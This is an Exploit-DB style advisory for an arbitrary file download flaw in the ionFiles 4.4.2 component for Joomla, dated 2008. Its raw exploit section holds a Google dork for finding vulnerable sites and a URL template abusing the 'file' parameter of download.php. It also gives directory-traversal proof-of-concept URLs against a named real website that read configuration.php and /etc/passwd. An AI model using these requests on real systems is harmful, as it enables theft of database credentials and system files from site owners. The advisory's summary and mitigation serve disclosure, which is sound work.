Arbitrary File Download Vulnerability

vendor:

ionFiles

by:

Vrs-hCk

7.5

CVSS

HIGH

Arbitrary File Download

CWE

Product Name: ionFiles

Affected Version From: 4.4.2002

Affected Version To: 4.4.2002

Patch Exists: Yes

Related CWE: N/A

CPE: a:codecall:ionfiles:4.4.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Arbitrary File Download Vulnerability

A vulnerability exists in ionFiles 4.4.2 Component for Joomla! CMS, which allows an attacker to download arbitrary files from the server. This is due to the download.php script not properly sanitizing user-supplied input to the 'file' parameter. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing directory traversal characters to the download.php script. This will allow the attacker to download arbitrary files from the server.

Mitigation:

Upgrade to the latest version of ionFiles 4.4.2 Component for Joomla! CMS.

Source

Exploit-DB raw data:

[o]------------------------------------------------------------------------------------[x]
 |  Arbitrary File Download Vulnerability                                               |
[o]------------------------------------------------------------------------------------[o]
 |  Software : ionFiles 4.4.2 Component for Joomla! CMS                                 |
 |  Vendor   : http://forum.codecall.net/                                               |
 |  Date     : 23 October 2008                                                          |
 |  Author   : Vrs-hCk                                                                  |
 |  Contact  : d00r[at]telkom[dot]net                                                   |
[o]------------------------------------------------------------------------------------[o]

[Â»] Google Dork

    inurl:com_ionfiles

[Â»] Vulnerable

    ./download.php
	
	Line 32: $file = $_GET['file'];
    Line 33: $download = $_GET['download'];
    Line 66 - 91

[Â»] Exploit

    http://[site]/[path]/com_ionfiles/download.php?file=[path_file]&download=1

[Â»] Proof of Concept

    http://esecutech.com/components/com_ionfiles/download.php?file=../../configuration.php&download=1
    http://esecutech.com/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1

[o]------------------------------------------------------------------------------------[x]
 |  Greetz                                                                              |
[o]------------------------------------------------------------------------------------[o]
 |  All Member oF MainHack BrotherHood - www.MainHack.com - www.ServerIsDown.org        |
 |  Jack, Darmawan, Mario, Zeth, Angela Chang, Janroe, Lukman, Didy, Anthonius,         |
 |  Daus, Rijal, Andrei, Toyong, dkk ... Indonesia Banget xixixix ... :))               |
[o]------------------------------------------------------------------------------------[o]

# milw0rm.com [2008-10-22]